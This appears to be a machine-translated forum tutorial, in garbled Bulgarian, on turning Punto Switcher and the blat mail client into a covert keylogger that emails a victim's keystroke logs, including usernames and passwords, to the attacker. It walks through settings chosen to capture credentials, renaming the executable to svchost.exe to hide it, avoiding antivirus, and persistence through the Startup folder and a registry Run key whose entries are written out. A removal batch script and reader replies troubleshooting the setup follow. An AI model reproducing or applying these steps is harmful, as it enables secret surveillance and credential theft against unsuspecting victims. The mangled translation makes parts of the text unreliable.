Ние правим записване на натиснатите клавиши от Punto превключвател с изпращане на поща трупи

Portable Keylogger не изгарящ антивирусна, работещи без администраторски права, основани на Punto Switcher (наричан PS) изпращане на дневника (дневник) до пощата.

И така, ние се нуждаем от версия на PS 3.2.9 или по-млади. Можете да го изтеглите от официалния сайт с Yandex. При по-старите версии на Keylogger 3.2.9 не се случи в курса ще обясня защо. Така че имаме нужда от конзола blat312_32.full.zip мейл клиент. Намерите и изтеглите само регистрирани потребители могат да виждат възможни на [връзки. ]

Създаване на Keylogger ще опише в Windows 7 x86 с активиран по подразбиране UAC.

Изпълнете PS за монтаж. Премахване на допълнителните кърлежите, свързани с инсталирането на софтуер от Yandex.

Натиснете Next, ние сме съгласни с искането за UAC. В края на инсталацията натиснете Finish.

иконата в лентата трябва да се появи PS. Кликнете върху него с десния бутон и отидете в настройките.

В раздела Общи на раздела Основни положения махнете всички отметки.
В раздела Разширени, сложи проверка следи клипборда система.
В клавишни комбинации за премахване на всички комбинации с изключение на клавишни комбинации за Отваряне на настройките като Punto Switcher Ctrl + 0.

В превключване правила, в дъното на кърлежите.
При отстраняване на проблеми problemm ние поставяме отметка подобно на изображението по-долу.

В автокоригирането махнете всички отметки.
В Звуци - да избере да изключи всички.
В Дневника отмятат като в изображението по-долу.

Ако е необходимо, в блога, можете да сложите парола. И сега внимание - в PS версии по-стари от 3.9.2 PS блог не поддържа регистър на две кратки думи и поради това по-старите версии не са подходящи да се намеси потребителски имена и пароли.

Щракнете върху OK, PS икона изчезва от тавата. За да проверите на открито tekstovichek пиша всеки текст кликване комбинация CTRL + 0, отидете на раздела дневник, кликнете Open дневник и да видим

Нашите настройки Keylogger пазят всичко работи. Продължавай.

След това създайте десктоп папка дърво записване на натиснатите клавиши на \ Windows \ System32 \ Пунто \ AppData Rasspakovyvaem изтегления преди blat312_32.full.zip вижте пълната папка. Файлове от него (4 бр.), Създаде копие на работния плот Keylogger \ Windows \ System32. По същия diriktorii създадете команден файл с blat.bat тук такъв код:

Къде [email protected] и паролата се сменя на свой_почтовый_ящик@mail.ru и svoy_parol от кутия

Къде -body "DiaryPS" - заглавието на съобщението. Вие може да се промени до такава -body "CrackLoh"

Ако използвате друг имейл услуга Mail.ru не променя сървъра Mail.ru на SMTP сървъра на вашия мейл услуга. Аз лично предпочитам Mail.ru за своя интерфейс ви позволява да зададете парола в папка в пощенската ви кутия, и дори ако жертвата намира команден файл с име и парола на електронната поща и да се понижат нищо лошо няма да се случи.

Всички други стойности команда няма да обяснява, че е извън обхвата на тази статия. Те търсят в Google и инструкции Blat'u.

И там (записване на натиснатите клавиши \ Windows \ System32) се създава партида файл start.bat с този код:

Целта на тази партида файл kopirovat PS при правилните настройки на място, добавете PS да се стартира автоматично Windows, както и да го стартирате.

С преминаването към System32 папка Punto в нея копирате съдържанието на C: \ Program Files \ Yandex \ Punto превключвател. Punto.exe файл преименуване в svchost.exe и той ще затвори в процесите на жертвата.

Освен това, всички в едно и също място на десктопа отидете на Keylogger \ Windows \ System32 \ Пунто \ AppData го създадете друга папка дърво Microsoft \ Windows \ Start Menu \ Programs \ Startup. От Startup създадете пряк път до файла, който ще се намира blat.bat C: blat.bat \ Windows \ System32 \ Но както blat.bat на място още за начинаещи с създаването на етикета да бъде проблем. Готови ли сте да дръпне на етикета може само регистрирани потребители могат да видят архивни [Връзки. ].

Целта на този етикет да бъде в стартовата папка и всеки път, когато стартирате Windows активират blat.bat файл, за да ни изпратите дневника (блога клавиши) до пощата. Можете да добавите стартиране през регистъра, но такова действие изисква права на администратор (заявка UAC).

Така че влезте (блог) д можем да получим, като пуснете C на жертвата: \ Window \ System32 \ blat.bat или чакат, докато жертвата ще се изключи и включи компютъра. За да прочетете diary.dat които ще се нуждаем от вашата собствена кола в папка C: \ Program Files \ Yandex \ Punto Switcher копирате файлове diary.dll и diary.exe в папка C: \ Users \ User \ AppData \ Roaming \ Yandex \ Punto Switcher \ потребителски данни. Къде Users \ потребителско име на вашата машина \ име на вашия потребителски. Има също така да сложите diary.dat и стартирате diary.exe ..

За хората, които използват Windows XP жертви в общи линии едни и същи както за Групата на седемте са само няколко разлики.

За XP папка Keylogger \ Windows \ System32 start.bat партида файл е създаден със следното съдържание:

В Keylogger на папката \ Windows \ System32 \ AppData Punto създаде и AppData2
От C: \ Users \ User \ AppData \ Roaming AppData папка, за да копирате папката Yandex
В AppData2 папка Създаване дърво папка Start Menu \ Programs \ Startup (Windows българската версия) и го поставете в прекия път Startup на blat.bat

За да премахнете Keylogger от процеса на жертвата машина го убие и стартирайте файла партида с този код:

@echo разстояние
@chcp 1251
@del / и / р "% SystemRoot% \ system32 \ blat.bat"
@del / и / р "% SystemRoot% \ system32 \ blat.dll"
@del / и / р "% SystemRoot% \ system32 \ Blat.exe"
@del / и / р "% SystemRoot% \ system32 \ blat.lib"
@del / и / р "% SystemRoot% \ system32 \ blatdll.h"
@del / и / р "% SystemRoot% \ system32 \ start.bat"
@rmdir / и / р "Start Menu \ Programs \ Startup"
@rmdir / и / р "Microsoft \ Windows \ Start Menu \ Programs \ Startup"
@rmdir / и / р "% APPDATA% \ Yandex"
@rmdir / и / р "% SystemRoot% \ system32 \ Punto"

Ако има грешка в темата на имейла. Ние ще се разбере правилно.

Сега има проблем с изпращането на дневник, се опита да спечели.

Добавянето на:
1. Цитат:
Публикувано от Colonial0
Освен това, всички в едно и също място на десктопа отидете на Keylogger \ Windows \ System32 \ Пунто \ AppData го създадете друга папка дърво Microsoft \ Windows \ Start Menu \ Programs \ Startup

Път към седемте прилича: \ AppData \ Roaming \ Microsoft \ Windows \ Start Menu \ Programs \ Startup. Roamng забравена папка? Точно сега, ние го проверите.

Проверих. Когато започнете start.bat 7 файлове са копирани, се използва само копирате 6. Въпреки известния напредък все още не стабилност. След претоварване все още не референтни трупи. Shortcut добавя към стартиране, не, не просто в папката стартиране. Наистина направите ръчно? А и да се опита.
Готово!

Твърде уличаващи. Можете да го направите, но все пак криво, искам повече.

Тя може да бъде в регистъра?

отворено Notepad, напишете:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ Curr entVersion \ Run]
"Блат" = "C: \\ Windows \\ System32 \\ blat.bat"
"Пунто" = "C: \\ Windows \\ System32 \\ \\ Punto Svchost .exe"

Премахване на стари етикети стартиране.

Рестарт.
Уличаващи пряк път в стартовата не. Punto план. CMD изскочил да запълни екрана и показва процеса на изпращане на трупи

Близо до това, което може да nahononado изпращане на сапун?

Присъдата :. Когато има достъп до компютър - можете да го направите, без да изпрати трупи (ако отдалечен достъп - това най-накрая не могат да издават копие дневник файл За да инсталирате един прост потребител не е необходимо, но като опция при инсталиране на операционната bezpalevnoy Antivir - Fit.

PS Webmaster, при редактиране на текст, което трябва да копирате поставите вашето съобщение на полето за редактиране е празна. Не е много удобно, има изкушение narkutit мнения)))

Добавен след 5 часа и 15 минути

цитат:
Публикувано от Colonial0
И там (записване на натиснатите клавиши \ Windows \ System32) се създава партида файл start.bat с този код:

Когато линията е отговорен за стартирането му тук? , Аааа. Изглежда, попаднали в папката AppData.